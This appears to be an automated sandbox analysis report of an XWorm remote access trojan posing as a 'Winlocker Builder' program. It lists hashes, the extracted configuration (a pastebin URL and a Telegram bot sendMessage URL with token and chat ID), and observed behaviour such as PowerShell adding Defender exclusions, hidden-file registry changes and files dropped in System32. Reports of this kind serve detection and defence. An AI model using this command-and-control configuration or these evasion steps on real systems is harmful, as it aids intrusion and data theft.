xworm | 2eddf88a155ffdb09a1382d1955d26ae5e394def25a2eb4d8c558babce0acde4

Analysis

max time kernel
290s
max time network
299s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-01-2025 23:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Winlocker Builder v0.6.exe
Size

1.4MB
MD5

6b6a8cd5e51f45e84db0faf0e23bce20
SHA1

9ddfb0ea0ee600dcd5f8ef1878a19f4bb874cafd
SHA256

2eddf88a155ffdb09a1382d1955d26ae5e394def25a2eb4d8c558babce0acde4
SHA512

17dc258784448706eb3de95d328858dd64a15a7cd7abd33cac1cf8f0b6d73d58c0a7514f852f7159b9fb9996055cd942b101ebc53186e6722d168367075a698b
SSDEEP

24576:HYbXvsRLDInc+3WNyc4aKZQ6VvDrVq3EXcWdFVtV6d/PHk:F0c+Gr1YBrNXcEFVf6pPH

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

vTtlhGPfn0ebMPsq

Attributes

Install_directory
%Public%
install_file
explorer.exe
pastebin_url
https://pastebin.com/raw/4zaiEtZS
telegram
https://api.telegram.org/bot8175192176:AAHZuZ0-rHS66YSwsvh8-gQjbZYSbY3IyXo/sendMessage?chat_id=7537927256

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2156-72-0x0000000005100000-0x0000000005112000-memory.dmp	family_xworm

Modifies visiblity of hidden/system files in Explorer 2 TTPs 60 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	rundll32.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	4448	Winlocker Builder v0.6.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2652	powershell.exe
2948	powershell.exe
2336	powershell.exe
2904	powershell.exe
256	powershell.exe
1244	powershell.exe
1892	powershell.exe
3744	powershell.exe
3196	powershell.exe
832	powershell.exe
1596	powershell.exe
1704	powershell.exe
3488	powershell.exe
784	powershell.exe
3704	powershell.exe
2932	powershell.exe
3356	powershell.exe
3416	powershell.exe
232	powershell.exe
1440	powershell.exe
3836	powershell.exe
1328	powershell.exe
3852	powershell.exe
1400	powershell.exe
832	powershell.exe
2484	powershell.exe
2852	powershell.exe
3032	powershell.exe
2936	powershell.exe
4228	powershell.exe
1292	powershell.exe
2900	powershell.exe
2784	powershell.exe
896	powershell.exe
4476	powershell.exe
3116	powershell.exe
2864	powershell.exe
4104	powershell.exe
3600	powershell.exe
4956	powershell.exe
784	powershell.exe
1016	powershell.exe
1524	powershell.exe
4892	powershell.exe
1012	powershell.exe
1140	powershell.exe
4384	powershell.exe
4488	powershell.exe
948	powershell.exe
4920	powershell.exe
1096	powershell.exe
556	powershell.exe
4036	powershell.exe
2296	powershell.exe
3888	powershell.exe
3864	powershell.exe
4832	powershell.exe
4304	powershell.exe
228	powershell.exe
1896	powershell.exe
4840	powershell.exe
4240	powershell.exe
4480	powershell.exe
4924	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2300	explorer.exe
4832	explorer.exe
2112	explorer.exe
2164	explorer.exe

Loads dropped DLL 64 IoCs

pid	Process
1156	rundll32.exe
1156	rundll32.exe
1156	rundll32.exe
4980	rundll32.exe
4980	rundll32.exe
4980	rundll32.exe
2156	explorer.exe
2156	explorer.exe
2156	explorer.exe
3704	rundll32.exe
3704	rundll32.exe
3704	rundll32.exe
4108	rundll32.exe
4108	rundll32.exe
4108	rundll32.exe
3784	rundll32.exe
3784	rundll32.exe
3784	rundll32.exe
1164	rundll32.exe
1164	rundll32.exe
1164	rundll32.exe
4496	rundll32.exe
4496	rundll32.exe
4496	rundll32.exe
1388	rundll32.exe
1388	rundll32.exe
1388	rundll32.exe
2776	rundll32.exe
2776	rundll32.exe
2776	rundll32.exe
1764	rundll32.exe
1764	rundll32.exe
1764	rundll32.exe
3280	rundll32.exe
3280	rundll32.exe
3280	rundll32.exe
560	rundll32.exe
560	rundll32.exe
560	rundll32.exe
2860	rundll32.exe
2860	rundll32.exe
2860	rundll32.exe
2492	rundll32.exe
2492	rundll32.exe
2492	rundll32.exe
1840	rundll32.exe
1840	rundll32.exe
1840	rundll32.exe
2328	rundll32.exe
2328	rundll32.exe
2328	rundll32.exe
2544	rundll32.exe
2544	rundll32.exe
2544	rundll32.exe
4676	rundll32.exe
4676	rundll32.exe
4676	rundll32.exe
4700	rundll32.exe
4700	rundll32.exe
4700	rundll32.exe
2308	rundll32.exe
2308	rundll32.exe
2308	rundll32.exe
1420	rundll32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 59 IoCs

Web Service

T1102

flow	ioc
94	pastebin.com
121	pastebin.com
34	pastebin.com
68	pastebin.com
28	pastebin.com
26	pastebin.com
75	pastebin.com
21	pastebin.com
31	pastebin.com
82	pastebin.com
119	pastebin.com
24	pastebin.com
77	pastebin.com
92	pastebin.com
97	pastebin.com
100	pastebin.com
104	pastebin.com
64	pastebin.com
69	pastebin.com
70	pastebin.com
115	pastebin.com
33	pastebin.com
102	pastebin.com
113	pastebin.com
80	pastebin.com
62	pastebin.com
71	pastebin.com
89	pastebin.com
61	pastebin.com
65	pastebin.com
91	pastebin.com
98	pastebin.com
8	pastebin.com
67	pastebin.com
84	pastebin.com
88	pastebin.com
106	pastebin.com
110	pastebin.com
117	pastebin.com
1	pastebin.com
99	pastebin.com
108	pastebin.com
36	pastebin.com
63	pastebin.com
73	pastebin.com
93	pastebin.com
13	pastebin.com
35	pastebin.com
15	pastebin.com
32	pastebin.com
86	pastebin.com
123	pastebin.com
126	pastebin.com
19	pastebin.com
17	pastebin.com
30	pastebin.com
90	pastebin.com
95	pastebin.com
10	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
37	ip-api.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File opened for modification	C:\Windows\System32\WinLocker.lnk	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe
File created	C:\Windows\System32\WinLocker.cpl	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3001#immutable1 = "Sync files between your computer and network folders"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-2000#immutable1 = "View and manage devices, printers, and print jobs"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-160#immutable1 = "Uninstall or change programs on your computer."	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-2#immutable1 = "Recovery"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems."	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers."	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use."	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	Winlocker Builder v0.6.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-2#immutable1 = "Configure your telephone dialing rules and modem settings."	explorer.exe
